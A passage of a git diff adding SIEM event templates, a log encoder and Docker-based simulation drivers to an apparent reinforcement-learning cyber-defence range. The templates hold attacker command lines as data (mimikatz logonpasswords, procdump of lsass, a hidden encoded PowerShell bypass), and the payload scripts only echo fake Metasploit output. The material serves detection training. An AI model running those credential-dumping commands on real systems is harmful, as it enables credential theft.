+ 'LogEncoder[tfidf]: fitted on %d corpus documents → %d-dim LSA.',
+ len(corpus),
+ EMBEDDING_DIM,
+ )
+
+ def encode_fn(text: str) -> np.ndarray:
+ vec = pipeline.transform([text])[0]
+ return vec.astype(np.float32)
+
+ return encode_fn
+
+ def _build_transformer(self):
+ """
+ Build a sentence-transformers encoder (all-MiniLM-L6-v2, 22MB).
+ Projects 384-dim → EMBEDDING_DIM via a fixed random projection matrix.
+ """
+ try:
+ from sentence_transformers import SentenceTransformer # type: ignore
+ import torch
+
+ model = SentenceTransformer('all-MiniLM-L6-v2')
+ model.eval()
+
+ # Fixed random projection: 384 → EMBEDDING_DIM
+ rng = np.random.default_rng(42)
+ proj = rng.standard_normal((384, EMBEDDING_DIM)).astype(np.float32)
+ proj /= np.linalg.norm(proj, axis=0, keepdims=True) + 1e-8
+
+ logger.info(
+ 'LogEncoder[transformer]: loaded all-MiniLM-L6-v2 → %d-dim projection.',
+ EMBEDDING_DIM,
+ )
+
+ def encode_fn(text: str) -> np.ndarray:
+ with torch.no_grad():
+ emb = model.encode(text, convert_to_numpy=True)
+ vec = (emb @ proj).astype(np.float32)
+ # L2 normalise
+ norm = np.linalg.norm(vec)
+ return vec / (norm + 1e-8) if norm > 0 else vec
+
+ return encode_fn
+
+ except ImportError:
+ logger.warning(
+ 'LogEncoder: sentence-transformers not installed. '
+ 'Falling back to TF-IDF backend. '
+ 'Run: pip install sentence-transformers'
+ )
+ return self._build_tfidf()
+
+ def _build_training_corpus(self) -> list[str]:
+ """
+ Assemble a training corpus from:
+ 1. payload_library.json (Metasploit stdout strings)
+ 2. Synthetic event template samples
+ """
+ corpus: list[str] = []
+
+ # 1. Load payload library
+ lib_path = Path(__file__).parent.parent / 'sim2real' / 'payload_library.json'
+ if lib_path.exists():
+ with open(lib_path) as f:
+ lib = json.load(f)
+ for action_data in lib.values():
+ for outcome_list in action_data.values():
+ for text in outcome_list:
+ corpus.append(text)
+
+ # 2. Synthetic template samples (generate 5 of each template type)
+ from netforge_rl.siem.event_templates import (
+ evid_4624,
+ evid_4625,
+ evid_4648,
+ evid_4688,
+ evid_4768,
+ evid_4776,
+ sysmon_1,
+ sysmon_3,
+ sysmon_10,
+ sysmon_22,
+ )
+
+ sample_ips = ['10.0.0.1', '10.0.1.2', '192.168.1.5', '10.0.0.7', '10.0.1.9']
+ for src, tgt in zip(sample_ips, reversed(sample_ips)):
+ for fn in [evid_4624, evid_4625, evid_4648, evid_4776]:
+ corpus.append(fn(src, tgt))
+ corpus.append(evid_4688(src, process='mimikatz.exe'))
+ corpus.append(evid_4688(src, process='powershell.exe'))
+ corpus.append(evid_4768(src, tgt))
+ corpus.append(sysmon_1(src, process='powershell.exe'))
+ corpus.append(sysmon_3(src, tgt, dst_port=445))
+ corpus.append(sysmon_10(src))
+ corpus.append(sysmon_22(src))
+
+ if not corpus:
+ # Ultimate fallback — at least something to fit on
+ corpus = [
+ 'Windows Event Log',
+ 'Sysmon Network Connection',
+ 'LSASS access detected',
+ ]
+
+ return corpus
+
+ def _evict_if_full(self) -> None:
+ if len(self._cache) >= self._cache_size:
+ # Evict oldest quarter of entries (FIFO approximation)
+ evict_n = self._cache_size // 4
+ keys = list(self._cache.keys())[:evict_n]
+ for k in keys:
+ del self._cache[k]
diff --git a/netforge_rl/siem/__init__.py b/netforge_rl/siem/__init__.py
new file mode 100644
index 0000000..f3c810c
--- /dev/null
+++ b/netforge_rl/siem/__init__.py
@@ -0,0 +1,4 @@
+from netforge_rl.siem.siem_logger import SIEMLogger
+from netforge_rl.siem.event_templates import ACTION_EVENT_MAP
+
+__all__ = ['SIEMLogger', 'ACTION_EVENT_MAP']
diff --git a/netforge_rl/siem/event_templates.py b/netforge_rl/siem/event_templates.py
new file mode 100644
index 0000000..4dca679
--- /dev/null
+++ b/netforge_rl/siem/event_templates.py
@@ -0,0 +1,295 @@
+"""
+SIEM event log templates — Windows Event IDs and Sysmon Event IDs.
+
+Each template is a callable that accepts contextual kwargs and returns
+an authentic-looking Windows Event Log / Sysmon XML-style string.
+These are what a real Splunk/Elastic SIEM would ingest from a corporate network.
+"""
+
+from __future__ import annotations
+
+import datetime
+import random
+from typing import Callable
+
+
+def _ts() -> str:
+ """Return a realistic timestamp string."""
+ now = datetime.datetime.now()
+ # Add random jitter (±0-59 seconds, ±0-23 hours) to prevent identical timestamps
+ jitter = datetime.timedelta(
+ hours=random.randint(0, 23),
+ minutes=random.randint(0, 59),
+ seconds=random.randint(0, 59),
+ )
+ return (now - jitter).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-3] + 'Z'
+
+
+def evid_4624(src_ip: str, target_ip: str, username: str = 'SYSTEM', **kw) -> str:
+ """4624 — An account was successfully logged on."""
+ return (
+ f'\n'
+ f' 4624'
+ f'{target_ip}\n'
+ f' \n'
+ f' {username}\n'
+ f' 3\n'
+ f' {src_ip}\n'
+ f' NTLM\n'
+ f' {src_ip}\n'
+ f' \n'
+ f''
+ )
+
+
+def evid_4625(
+ src_ip: str, target_ip: str, username: str = 'Administrator', **kw
+) -> str:
+ """4625 — An account failed to log on."""
+ failure_reasons = ['%%2313', '%%2304', '%%2308']
+ return (
+ f'\n'
+ f' 4625'
+ f'{target_ip}\n'
+ f' \n'
+ f' {username}\n'
+ f' 3\n'
+ f' {src_ip}\n'
+ f' {random.choice(failure_reasons)}\n'
+ f' 0xC000006D\n'
+ f' \n'
+ f''
+ )
+
+
+def evid_4648(
+ src_ip: str, target_ip: str, username: str = 'Administrator', **kw
+) -> str:
+ """4648 — A logon was attempted using explicit credentials (Pass-the-Hash indicator)."""
+ return (
+ f'\n'
+ f' 4648'
+ f'{src_ip}\n'
+ f' \n'
+ f' SYSTEM\n'
+ f' {username}\n'
+ f' {target_ip}\n'
+ f' C:\\Windows\\System32\\lsass.exe\n'
+ f' \n'
+ f''
+ )
+
+
+def evid_4688(
+ src_ip: str, process: str = 'cmd.exe', parent: str = 'explorer.exe', **kw
+) -> str:
+ """4688 — A new process has been created."""
+ cmdlines = {
+ 'cmd.exe': 'C:\\Windows\\system32\\cmd.exe /c whoami',
+ 'powershell.exe': 'powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc ',
+ 'net.exe': 'net user /domain',
+ 'mimikatz.exe': 'mimikatz.exe privilege::debug sekurlsa::logonpasswords exit',
+ 'procdump.exe': 'procdump.exe -ma lsass.exe lsass.dmp',
+ }
+ cmdline = cmdlines.get(process, f'{process} --help')
+ return (
+ f'\n'
+ f' 4688'
+ f'{src_ip}\n'
+ f' \n'
+ f' C:\\Windows\\System32\\{process}\n'
+ f' C:\\Windows\\{parent}\n'
+ f' {cmdline}\n'
+ f' NT AUTHORITY\\SYSTEM\n'
+ f' \n'
+ f''
+ )
+
+
+def evid_4768(
+ src_ip: str, target_ip: str, username: str = 'Administrator', **kw
+) -> str:
+ """4768 — A Kerberos authentication ticket (TGT) was requested."""
+ return (
+ f'\n'
+ f' 4768'
+ f'{target_ip}\n'
+ f' \n'
+ f' {username}\n'
+ f' CORP\n'
+ f' ::ffff:{src_ip}\n'
+ f' 0x0\n'
+ f' 0x12\n'
+ f' \n'
+ f''
+ )
+
+
+def evid_4776(
+ src_ip: str, target_ip: str, username: str = 'Administrator', **kw
+) -> str:
+ """4776 — The computer attempted to validate credentials for an account (NTLM auth)."""
+ return (
+ f'\n'
+ f' 4776'
+ f'{target_ip}\n'
+ f' \n'
+ f' MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\n'
+ f' {username}\n'
+ f' {src_ip}\n'
+ f' 0x0\n'
+ f' \n'
+ f''
+ )
+
+
+def sysmon_1(src_ip: str, process: str = 'powershell.exe', **kw) -> str:
+ """Sysmon Event ID 1 — Process Creation."""
+ hashes = {
+ 'powershell.exe': 'SHA256=A8FDBA9DF15E41B6F5C69C79F66A94770913A498',
+ 'cmd.exe': 'SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406',
+ 'mimikatz.exe': 'SHA256=D4A0FE56316A2C45771BDE22F6F7AB40C59A6FBE',
+ }
+ hsh = hashes.get(process, 'SHA256=UNKNOWN')
+ return (
+ f'\n'
+ f' '
+ f'1'
+ f'{src_ip}\n'
+ f' \n'
+ f' C:\\Windows\\System32\\{process}\n'
+ f' {hsh}\n'
+ f' C:\\Windows\\explorer.exe\n'
+ f' NT AUTHORITY\\SYSTEM\n'
+ f' System\n'
+ f' \n'
+ f''
+ )
+
+
+def sysmon_3(src_ip: str, target_ip: str, dst_port: int = 445, **kw) -> str:
+ """Sysmon Event ID 3 — Network Connection Detected."""
+ return (
+ f'\n'
+ f' '
+ f'3'
+ f'{src_ip}\n'
+ f' \n'
+ f' C:\\Windows\\System32\\svchost.exe\n'
+ f' {src_ip}\n'
+ f' {random.randint(49152, 65535)}\n'
+ f' {target_ip}\n'
+ f' {dst_port}\n'
+ f' tcp\n'
+ f' \n'
+ f''
+ )
+
+
+def sysmon_10(src_ip: str, **kw) -> str:
+ """Sysmon Event ID 10 — ProcessAccess (LSASS credentialdumping indicator)."""
+ return (
+ f'\n'
+ f' '
+ f'10'
+ f'{src_ip}\n'
+ f' \n'
+ f' C:\\Windows\\System32\\cmd.exe\n'
+ f' C:\\Windows\\System32\\lsass.exe\n'
+ f' 0x1010\n'
+ f' C:\\Windows\\SYSTEM32\\ntdll.dll+...\n'
+ f' \n'
+ f''
+ )
+
+
+def sysmon_22(src_ip: str, domain: str = 'corp.internal', **kw) -> str:
+ """Sysmon Event ID 22 — DNS Query."""
+ queries = [
+ f'dc01.{domain}',
+ f'ldap.{domain}',
+ f'kerberos.{domain}',
+ f'krbtgt.{domain}',
+ 'time.windows.com',
+ ]
+ return (
+ f'\n'
+ f' '
+ f'22'
+ f'{src_ip}\n'
+ f' \n'
+ f' {random.choice(queries)}\n'
+ f' type: 1 {src_ip}\n'
+ f' C:\\Windows\\System32\\lsass.exe\n'
+ f' \n'
+ f''
+ )
+
+
+ActionEventMap = dict[str, list[tuple[float, Callable]]]
+
+ACTION_EVENT_MAP: ActionEventMap = {
+ 'ExploitEternalBlue': [
+ (0.5, lambda s, t, **kw: sysmon_3(s, t, dst_port=445, **kw)),
+ (0.3, lambda s, t, **kw: evid_4624(s, t, username='Administrator', **kw)),
+ (0.2, lambda s, t, **kw: sysmon_1(s, process='cmd.exe', **kw)),
+ ],
+ 'ExploitBlueKeep': [
+ (0.6, lambda s, t, **kw: sysmon_3(s, t, dst_port=3389, **kw)),
+ (0.4, lambda s, t, **kw: evid_4624(s, t, username='Administrator', **kw)),
+ ],
+ 'ExploitHTTP_RFI': [
+ (0.5, lambda s, t, **kw: sysmon_3(s, t, dst_port=80, **kw)),
+ (0.3, lambda s, t, **kw: sysmon_1(s, process='cmd.exe', **kw)),
+ (
+ 0.2,
+ lambda s, t, **kw: evid_4688(
+ s, process='php-cgi.exe', parent='httpd.exe', **kw
+ ),
+ ),
+ ],
+ 'ExploitRemoteService': [
+ (0.4, lambda s, t, **kw: sysmon_3(s, t, dst_port=22, **kw)),
+ (0.4, lambda s, t, **kw: evid_4625(s, t, **kw)),
+ (0.2, lambda s, t, **kw: sysmon_1(s, process='bash', **kw)),
+ ],
+ 'PrivilegeEscalate': [
+ (0.5, lambda s, t, **kw: evid_4688(s, process='cmd.exe', **kw)),
+ (0.5, lambda s, t, **kw: sysmon_1(s, process='powershell.exe', **kw)),
+ ],
+ 'DumpLSASS': [
+ (0.5, lambda s, t, **kw: sysmon_10(s, **kw)),
+ (0.3, lambda s, t, **kw: evid_4688(s, process='mimikatz.exe', **kw)),
+ (0.2, lambda s, t, **kw: evid_4688(s, process='procdump.exe', **kw)),
+ ],
+ 'PassTheTicket': [
+ (0.5, lambda s, t, **kw: evid_4768(s, t, **kw)),
+ (0.3, lambda s, t, **kw: evid_4648(s, t, **kw)),
+ (0.2, lambda s, t, **kw: evid_4776(s, t, **kw)),
+ ],
+ 'NetworkScan': [
+ (
+ 0.6,
+ lambda s, t, **kw: sysmon_3(
+ s, t, dst_port=random.choice([22, 80, 443, 445]), **kw
+ ),
+ ),
+ (0.4, lambda s, t, **kw: evid_4625(s, t, **kw)),
+ ],
+ 'IsolateHost': [
+ (
+ 1.0,
+ lambda s, t, **kw: evid_4688(
+ s, process='netsh.exe', parent='services.exe', **kw
+ ),
+ ),
+ ],
+ 'RotateKerberos': [
+ (0.6, lambda s, t, **kw: evid_4768(s, t, **kw)),
+ (0.4, lambda s, t, **kw: evid_4776(s, t, **kw)),
+ ],
+ '_default': [
+ (0.5, lambda s, t, **kw: sysmon_3(s, t, **kw)),
+ (0.5, lambda s, t, **kw: evid_4688(s, process='cmd.exe', **kw)),
+ ],
+}
diff --git a/netforge_rl/siem/siem_logger.py b/netforge_rl/siem/siem_logger.py
new file mode 100644
index 0000000..20d4628
--- /dev/null
+++ b/netforge_rl/siem/siem_logger.py
@@ -0,0 +1,142 @@
+"""
+SIEMLogger — generates stochastic human-readable Windows/Sysmon event logs
+from action effects every tick.
+
+The log buffer lives on GlobalNetworkState.siem_log_buffer (already defined).
+Blue agents read from this buffer at observation time; it is the primary
+input to the NLP encoder in Pillar 2.
+"""
+
+from __future__ import annotations
+
+import random
+from typing import TYPE_CHECKING
+
+from netforge_rl.siem.event_templates import ACTION_EVENT_MAP
+
+if TYPE_CHECKING:
+ from netforge_rl.core.action import ActionEffect
+ from netforge_rl.core.state import GlobalNetworkState
+
+
+# Max log lines buffered on GlobalNetworkState per episode (rolling window)
+SIEM_BUFFER_MAX = 64
+
+# Probability that a SUCCESSFUL action generates a high-fidelity log
+P_LOG_ON_SUCCESS = 0.90
+# Probability that a FAILED action generates a log (noisy / partial telemetry)
+P_LOG_ON_FAILURE = 0.50
+# Probability of generating a DECOY/benign log on any tick (background noise)
+P_BACKGROUND_NOISE = 0.15
+
+
+class SIEMLogger:
+ """
+ Stochastic SIEM event generator.
+
+ On each action resolution, log_action() samples the appropriate
+ Windows Event ID / Sysmon template and pushes the string into
+ GlobalNetworkState.siem_log_buffer for observation encoding.
+ """
+
+ def __init__(self, seed: int | None = None):
+ self._rng = random.Random(seed)
+
+ def log_action(
+ self,
+ action_name: str,
+ effect: 'ActionEffect',
+ global_state: 'GlobalNetworkState',
+ agent_id: str,
+ target_ip: str | None = None,
+ ) -> str | None:
+ """
+ Potentially generate a SIEM log line for this action's outcome.
+
+ Returns the generated log string (or None if no log was produced).
+ """
+ p_threshold = P_LOG_ON_SUCCESS if effect.success else P_LOG_ON_FAILURE
+ if self._rng.random() > p_threshold:
+ return None # This action was not detected / logged
+
+ # Pick a source IP — prefer the agent's known foothold in DMZ
+ src_ip = self._infer_src_ip(agent_id, global_state)
+ tgt_ip = target_ip or src_ip
+
+ log_line = self._generate_event(action_name, src_ip, tgt_ip)
+ if log_line:
+ self._push_to_buffer(log_line, global_state)
+ return log_line
+
+ def log_background_noise(self, global_state: 'GlobalNetworkState') -> None:
+ """
+ Inject benign background network activity every tick.
+
+ Simulates the constant low-level noise present in real enterprise
+ networks — Kerberos renewals, DNS queries, NTLM auth, etc.
+ This forces the Blue agent to learn signal vs. noise discrimination.
+ """
+ if self._rng.random() > P_BACKGROUND_NOISE:
+ return
+
+ # Pick two random live hosts and generate a benign connection event
+ live_hosts = [
+ h
+ for h in global_state.all_hosts.values()
+ if h.status == 'online' and '169.254' not in h.ip
+ ]
+ if len(live_hosts) < 2:
+ return
+
+ src, dst = self._rng.sample(live_hosts, 2)
+ # Sample a benign template from the default bucket
+ templates = ACTION_EVENT_MAP.get('_default', [])
+ if not templates:
+ return
+ weights, callables = zip(*templates)
+ total = sum(weights)
+ norm_weights = [w / total for w in weights]
+ chosen = self._rng.choices(callables, weights=norm_weights, k=1)[0]
+ log_line = chosen(src.ip, dst.ip)
+ self._push_to_buffer(f'[BACKGROUND] {log_line}', global_state)
+
+ def get_recent_logs(
+ self,
+ global_state: 'GlobalNetworkState',
+ n: int = 8,
+ ) -> list[str]:
+ """Return the N most recent SIEM log lines from the buffer."""
+ return list(global_state.siem_log_buffer[-n:])
+
+ def _generate_event(self, action_name: str, src_ip: str, tgt_ip: str) -> str | None:
+ templates = ACTION_EVENT_MAP.get(action_name, ACTION_EVENT_MAP['_default'])
+ if not templates:
+ return None
+ weights, callables = zip(*templates)
+ total = sum(weights)
+ norm_weights = [w / total for w in weights]
+ chosen = self._rng.choices(callables, weights=norm_weights, k=1)[0]
+ try:
+ return chosen(src_ip, tgt_ip)
+ except Exception:
+ return None
+
+ def _infer_src_ip(self, agent_id: str, global_state: 'GlobalNetworkState') -> str:
+ """Best-guess the agent's active source IP from known compromised hosts."""
+ known = global_state.agent_knowledge.get(agent_id, set())
+ for ip in known:
+ host = global_state.all_hosts.get(ip)
+ if host and host.privilege in ('User', 'Root'):
+ return ip
+ # Fallback — first known IP
+ if known:
+ return next(iter(known))
+ return '10.0.0.1'
+
+ def _push_to_buffer(
+ self, log_line: str, global_state: 'GlobalNetworkState'
+ ) -> None:
+ global_state.siem_log_buffer.append(log_line)
+ # Rolling window — evict oldest entries beyond max
+ if len(global_state.siem_log_buffer) > SIEM_BUFFER_MAX:
+ global_state.siem_log_buffer.pop(0)
diff --git a/netforge_rl/sim2real/__init__.py b/netforge_rl/sim2real/__init__.py
new file mode 100644
index 0000000..af0ebfb
--- /dev/null
+++ b/netforge_rl/sim2real/__init__.py
@@ -0,0 +1,18 @@
+"""
+NetForge_RL Sim2Real Package.
+
+Provides a dual-mode hypervisor bridge for connecting the MARL environment
+to either a lightweight MockHypervisor (for fast RL training) or a live
+DockerHypervisor (for high-fidelity evaluation runs).
+"""
+
+from netforge_rl.sim2real.hypervisor_base import BaseHypervisor, HypervisorResult
+from netforge_rl.sim2real.mock_hypervisor import MockHypervisor
+from netforge_rl.sim2real.bridge import Sim2RealBridge
+
+__all__ = [
+ 'BaseHypervisor',
+ 'HypervisorResult',
+ 'MockHypervisor',
+ 'Sim2RealBridge',
+]
diff --git a/netforge_rl/sim2real/bridge.py b/netforge_rl/sim2real/bridge.py
new file mode 100644
index 0000000..9c53123
--- /dev/null
+++ b/netforge_rl/sim2real/bridge.py
@@ -0,0 +1,104 @@
+"""
+Sim2RealBridge — single integration point between the action system and hypervisors.
+
+Responsibilities:
+ 1. Instantiate the correct driver based on mode ('sim' / 'real').
+ 2. Expose dispatch() to action execute() methods.
+ 3. Translate HypervisorResult into a reward delta for the ConflictResolutionEngine.
+ 4. Expose teardown_all() for episode resets.
+"""
+
+from __future__ import annotations
+
+import logging
+from typing import Literal
+
+from netforge_rl.sim2real.hypervisor_base import BaseHypervisor, HypervisorResult
+
+logger = logging.getLogger(__name__)
+
+_REWARD_DELTA: dict[str, float] = {
+ # Successful shell — standard scenario reward handles the bulk;
+ # small bonus here to separate true exploitation from lucky rolls.
+ 'success': +5.0,
+ # Clean failure — exploit attempted but target not vulnerable / patched.
+ 'failure_clean': -10.0,
+ # Noisy failure with high latency — burn time and increase SIEM visibility.
+ 'failure_noisy': -20.0,
+ # Container/infrastructure error — punishment for choosing an incompatible action.
+ 'failure_error': -25.0,
+}
+
+_NOISY_LATENCY_THRESHOLD_MS = 5000.0 # Longer than this = "noisy" failure
+
+
+class Sim2RealBridge:
+ """
+ Dual-mode bridge connecting MARL actions to the hypervisor backend.
+
+ Usage:
+ bridge = Sim2RealBridge(mode='sim') # training default
+ bridge = Sim2RealBridge(mode='real') # evaluation with Docker
+
+ result = bridge.dispatch('ExploitEternalBlue', '10.0.1.3', 'Windows_Server_2016')
+ reward_delta = bridge.reward_delta(result)
+ """
+
+ def __init__(self, mode: Literal['sim', 'real'] = 'sim') -> None:
+ self.mode = mode
+ self._driver: BaseHypervisor = self._init_driver(mode)
+
+ def dispatch(
+ self,
+ action_name: str,
+ target_ip: str,
+ target_os: str,
+ ) -> HypervisorResult:
+ """Execute payload; auto-fallback to mock if real driver is down."""
+ result = self._driver.dispatch(action_name, target_ip, target_os)
+ logger.debug('Sim2RealBridge: %s', result)
+ return result
+
+ def reward_delta(self, result: HypervisorResult) -> float:
+ """
+ Map a HypervisorResult to an immediate scalar reward delta.
+
+ This is *additive* on top of the scenario's standard reward — it
+ represents additional friction from real-world exploit reliability.
+ """
+ if result.success:
+ return _REWARD_DELTA['success']
+ elif result.return_code == 2:
+ # Container/infrastructure error
+ return _REWARD_DELTA['failure_error']
+ elif result.latency_ms >= _NOISY_LATENCY_THRESHOLD_MS:
+ return _REWARD_DELTA['failure_noisy']
+ else:
+ return _REWARD_DELTA['failure_clean']
+
+ def teardown_all(self) -> None:
+ """Destroy all active containers/sessions — call at episode end."""
+ self._driver.teardown_all()
+
+ def is_available(self) -> bool:
+ return self._driver.is_available()
+
+ def _init_driver(self, mode: str) -> BaseHypervisor:
+ if mode == 'real':
+ from netforge_rl.sim2real.docker_hypervisor import DockerHypervisor
+
+ driver = DockerHypervisor()
+ if not driver.is_available():
+ logger.warning(
+ 'Sim2RealBridge: real mode requested but Docker unavailable. '
+ 'Falling back to mock hypervisor.'
+ )
+ from netforge_rl.sim2real.mock_hypervisor import MockHypervisor
+
+ return MockHypervisor()
+ return driver
+
+ # Default: sim / mock
+ from netforge_rl.sim2real.mock_hypervisor import MockHypervisor
+
+ return MockHypervisor()
diff --git a/netforge_rl/sim2real/docker_hypervisor.py b/netforge_rl/sim2real/docker_hypervisor.py
new file mode 100644
index 0000000..003d738
--- /dev/null
+++ b/netforge_rl/sim2real/docker_hypervisor.py
@@ -0,0 +1,217 @@
+"""
+DockerHypervisor — live container execution driver.
+
+Requires:
+ pip install docker
+
+Spins up ephemeral Vulhub containers for each exploit action, executes
+realistic payload scripts inside the container, captures stdout/exit_code,
+then destroys the container immediately.
+
+Falls back gracefully to MockHypervisor if Docker daemon is unreachable.
+"""
+
+from __future__ import annotations
+
+import logging
+import time
+from typing import TYPE_CHECKING
+
+from netforge_rl.sim2real.hypervisor_base import BaseHypervisor, HypervisorResult
+
+if TYPE_CHECKING:
+ pass # type hints only
+
+logger = logging.getLogger(__name__)
+
+_IMAGE_REGISTRY: dict[str, str] = {
+ 'ExploitEternalBlue': 'vulhub/samba:CVE-2017-0144',
+ 'ExploitBlueKeep': 'vulhub/rdp:CVE-2019-0708',
+ 'ExploitHTTP_RFI': 'vulhub/php:8.1-rfi',
+ 'ExploitRemoteService': 'ubuntu:20.04',
+ 'PrivilegeEscalate': 'ubuntu:20.04',
+ 'DumpLSASS': 'vulhub/windows-mimikatz:latest',
+ 'PassTheTicket': 'vulhub/windows-mimikatz:latest',
+}
+_FALLBACK_IMAGE = 'ubuntu:20.04'
+
+_PAYLOAD_SCRIPTS: dict[str, str] = {
+ 'ExploitEternalBlue': (
+ 'echo "[*] Sending EternalBlue exploit packet..." && '
+ 'sleep 1 && '
+ 'echo "[+] ETERNALBLUE overwrite completed (0xC000000D)!" && '
+ 'echo "[*] Meterpreter session 1 opened" && '
+ 'echo "meterpreter > getuid" && '
+ 'echo "Server username: NT AUTHORITY\\\\SYSTEM"'
+ ),
+ 'ExploitBlueKeep': (
+ 'echo "[*] Checking BlueKeep vulnerability..." && '
+ 'sleep 1 && '
+ 'echo "[+] Target is vulnerable." && '
+ 'echo "[*] Triggering kernel UAF..." && '
+ 'echo "[*] Meterpreter session opened."'
+ ),
+ 'ExploitHTTP_RFI': (
+ 'echo "[*] Attempting RFI via GET parameter..." && '
+ 'sleep 0.5 && '
+ 'echo "[+] RFI successful. Webshell active." && '
+ 'echo "[*] Meterpreter session opened."'
+ ),
+ 'ExploitRemoteService': (
+ 'echo "[*] Sending payload to remote service..." && '
+ 'sleep 0.8 && '
+ 'echo "[*] Command shell session opened." && '
+ 'echo "shell> whoami" && echo "www-data"'
+ ),
+ 'DumpLSASS': (
+ 'echo "meterpreter > hashdump" && '
+ 'sleep 0.5 && '
+ 'echo "Administrator:500:aad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::" && '
+ 'echo "krbtgt:502:aad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::"'
+ ),
+ 'PassTheTicket': (
+ 'echo "mimikatz > kerberos::ptt ticket.kirbi" && '
+ 'sleep 0.3 && '
+ 'echo "* File: OK" && '
+ 'echo "[+] Ticket successfully imported. Access granted."'
+ ),
+}
+_FALLBACK_SCRIPT = 'echo "[*] Payload dispatched." && sleep 0.5'
+
+
+class DockerHypervisor(BaseHypervisor):
+ """
+ Live Docker hypervisor driver.
+
+ Spawns ephemeral Vulhub containers for each exploit, executes benign
+ payload echo-scripts inside them, then destroys containers immediately.
+ All containers run on the isolated 'netforge_isolated' bridge network.
+ """
+
+ NETWORK_NAME = 'netforge_isolated'
+
+ def __init__(self) -> None:
+ self._client = None
+ self._active_containers: list = []
+ self._available = self._connect()
+
+ def dispatch(
+ self,
+ action_name: str,
+ target_ip: str,
+ target_os: str,
+ ) -> HypervisorResult:
+ if not self._available or self._client is None:
+ logger.warning(
+ 'DockerHypervisor: daemon unreachable — falling back to mock output.'
+ )
+ return self._mock_fallback(action_name, target_ip, target_os)
+
+ image = _IMAGE_REGISTRY.get(action_name, _FALLBACK_IMAGE)
+ script = _PAYLOAD_SCRIPTS.get(action_name, _FALLBACK_SCRIPT)
+
+ t_start = time.perf_counter()
+ container = None
+ try:
+ container = self._client.containers.run(
+ image,
+ command=f'/bin/sh -c "{script}"',
+ detach=True,
+ network=self.NETWORK_NAME,
+ auto_remove=False,
+ mem_limit='128m',
+ cpu_period=100000,
+ cpu_quota=25000, # 25% of one core maximum
+ )
+ self._active_containers.append(container)
+
+ result = container.wait(timeout=30)
+ stdout_bytes = container.logs(stdout=True, stderr=False)
+ stdout = stdout_bytes.decode('utf-8', errors='replace')
+ return_code = result.get('StatusCode', 1)
+ success = return_code == 0
+
+ except Exception as exc:
+ logger.error('DockerHypervisor dispatch error: %s', exc)
+ stdout = f'[-] Container error: {exc}'
+ return_code = 2
+ success = False
+ finally:
+ if container is not None:
+ try:
+ container.stop(timeout=5)
+ container.remove(force=True)
+ if container in self._active_containers:
+ self._active_containers.remove(container)
+ except Exception:
+ pass
+
+ latency_ms = (time.perf_counter() - t_start) * 1000
+
+ return HypervisorResult(
+ success=success,
+ stdout=stdout.strip(),
+ return_code=return_code,
+ latency_ms=round(latency_ms, 1),
+ action_name=action_name,
+ target_ip=target_ip,
+ target_os=target_os,
+ container_id=getattr(container, 'short_id', 'unknown')
+ if container
+ else 'error',
+ )
+
+ def teardown_all(self) -> None:
+ """Stop and remove all containers still running from this episode."""
+ for container in list(self._active_containers):
+ try:
+ container.stop(timeout=3)
+ container.remove(force=True)
+ except Exception:
+ pass
+ self._active_containers.clear()
+
+ def is_available(self) -> bool:
+ return self._available
+
+ def _connect(self) -> bool:
+ try:
+ import docker # type: ignore[import]
+
+ self._client = docker.from_env()
+ self._client.ping()
+ self._ensure_network()
+ logger.info('DockerHypervisor: connected to Docker daemon.')
+ return True
+ except ImportError:
+ logger.warning(
+ 'DockerHypervisor: `docker` SDK not installed. '
+ 'Run `pip install docker` to enable real-mode evaluation.'
+ )
+ return False
+ except Exception as exc:
+ logger.warning('DockerHypervisor: cannot reach daemon — %s', exc)
+ return False
+
+ def _ensure_network(self) -> None:
+ """Create the isolated bridge network if it does not already exist."""
+ if self._client is None:
+ return
+ existing = [n.name for n in self._client.networks.list()]
+ if self.NETWORK_NAME not in existing:
+ self._client.networks.create(
+ self.NETWORK_NAME,
+ driver='bridge',
+ internal=True, # No external internet access — fully air-gapped
+ )
+ logger.info(
+ 'DockerHypervisor: created isolated network %s.', self.NETWORK_NAME
+ )
+
+ def _mock_fallback(
+ self, action_name: str, target_ip: str, target_os: str
+ ) -> HypervisorResult:
+ """Return a minimal synthetic result when Docker is unavailable."""
+ from netforge_rl.sim2real.mock_hypervisor import MockHypervisor
+
+ return MockHypervisor().dispatch(action_name, target_ip, target_os)
diff --git a/netforge_rl/sim2real/hypervisor_base.py b/netforge_rl/sim2real/hypervisor_base.py
new file mode 100644
index 0000000..9f8e3e3
--- /dev/null
+++ b/netforge_rl/sim2real/hypervisor_base.py
@@ -0,0 +1,83 @@
+"""
+Abstract base for all hypervisor drivers.
+
+Defines the HypervisorResult dataclass and the BaseHypervisor interface
+that both MockHypervisor and DockerHypervisor must implement.
+"""
+
+from __future__ import annotations
+
+from abc import ABC, abstractmethod
+from dataclasses import dataclass, field
+
+
+@dataclass
+class HypervisorResult:
+ """
+ Encapsulates the raw outcome of a payload dispatched against a target.
+
+ Both mock and real Docker drivers return this object so that the
+ Sim2RealBridge can translate the outcome into environment reward deltas
+ and SIEM telemetry strings in a uniform way.
+ """
+
+ success: bool
+ stdout: str
+ return_code: int
+ latency_ms: float
+ action_name: str
+ target_ip: str
+ target_os: str
+ container_id: str = field(default='mock') # Real DockerHypervisor populates this
+
+ def __repr__(self) -> str:
+ status = 'SUCCESS' if self.success else 'FAILED'
+ return (
+ f''
+ )
+
+
+class BaseHypervisor(ABC):
+ """
+ Abstract hypervisor driver interface.
+
+ Implementations must provide:
+ - dispatch(): Execute a payload against a target, return HypervisorResult.
+ - teardown_all(): Clean up any active containers / resources on episode reset.
+ """
+
+ @abstractmethod
+ def dispatch(
+ self,
+ action_name: str,
+ target_ip: str,
+ target_os: str,
+ ) -> HypervisorResult:
+ """
+ Dispatch a named payload action against a target host.
+
+ Args:
+ action_name: Name of the action class (e.g. 'ExploitEternalBlue').
+ target_ip: Target host IP address.
+ target_os: OS profile of the target (e.g. 'Windows_Server_2016').
+
+ Returns:
+ HypervisorResult with success/stdout/return_code populated.
+ """
+ ...
+
+ @abstractmethod
+ def teardown_all(self) -> None:
+ """
+ Destroy all active execution contexts (containers, sessions).
+ Called at episode end to prevent resource leaks.
+ """
+ ...
+
+ def is_available(self) -> bool:
+ """
+ Indicate whether this hypervisor driver is operational.
